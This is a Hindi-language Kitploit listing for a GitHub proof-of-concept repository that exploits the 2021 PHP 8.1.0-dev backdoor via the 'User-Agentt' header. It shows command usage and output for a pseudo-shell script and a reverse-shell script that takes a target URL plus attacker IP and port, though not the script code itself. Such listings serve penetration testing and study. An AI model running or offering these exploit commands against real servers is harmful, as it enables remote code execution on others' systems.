Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
php-8.1.0-dev-backdoor-rce — PHP 8.1.0-dev Backdoor System Shell Script | Kitploit
उपकरण/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

रिपॉजिटरी देखें
94215 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP 8.1.0-dev बैकडोर रिमोट कोड निष्पादन

PHP 8.1.0-dev बैकडोर सिस्टम शेल स्क्रिप्ट

docs/logo_php81.png

PHP संस्करण 8.1.0-dev 28 मार्च 2021 को एक बैकडोर के साथ जारी किया गया था, लेकिन बैकडोर जल्दी ही खोज लिया गया और हटा दिया गया। यदि PHP का यह संस्करण किसी सर्वर पर चलता है, तो एक हमलावर User-Agentt हेडर भेजकर मनमाना कोड निष्पादित कर सकता है।

समस्या का पता चलने के बाद मूल कोड को बहाल कर दिया गया था, लेकिन फिर दूसरी बार छेड़छाड़ की गई। इस उल्लंघन ने उन सभी वेबसाइटों में एक बैकडोर बना दिया होता जो PHP के समझौता किए गए संस्करण को चला रही थीं, जिससे हैकर्स साइट पर रिमोट कोड निष्पादन कर सकते थे।

पूरा लेख पढ़ें: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


POC स्क्रिप्ट

यह छोटी एक्सप्लॉइट स्क्रिप्ट backdoor_php_8.1.0-dev.py बैकडोर का उपयोग करके होस्ट पर एक स्यूडो सिस्टम शेल प्रदान करती है। इसे Exploit DB पर खोजें।

  • एक्सप्लॉइट शीर्षक: PHP 8.1.0-dev बैकडोर रिमोट कोड निष्पादन
  • दिनांक: 23 मई 2021
  • एक्सप्लॉइट लेखक: flast101
  • विक्रेता होमपेज: https://www.php.net/
  • सॉफ़्टवेयर लिंक: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • परीक्षित संस्करण: 8.1.0-dev
  • CVE : N/A
  • भेद्यता संदर्भ:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

उपयोग:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

रिवर्स शेल

यह छोटी एक्सप्लॉइट स्क्रिप्ट revshell_php_8.1.0-dev.py लक्ष्य पर एक रिवर्स शेल प्रदान करती है।

उपयोग:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

जिज्ञासु बनें, सीखना ही जीवन है! 😃

टूल डाउनलोड करें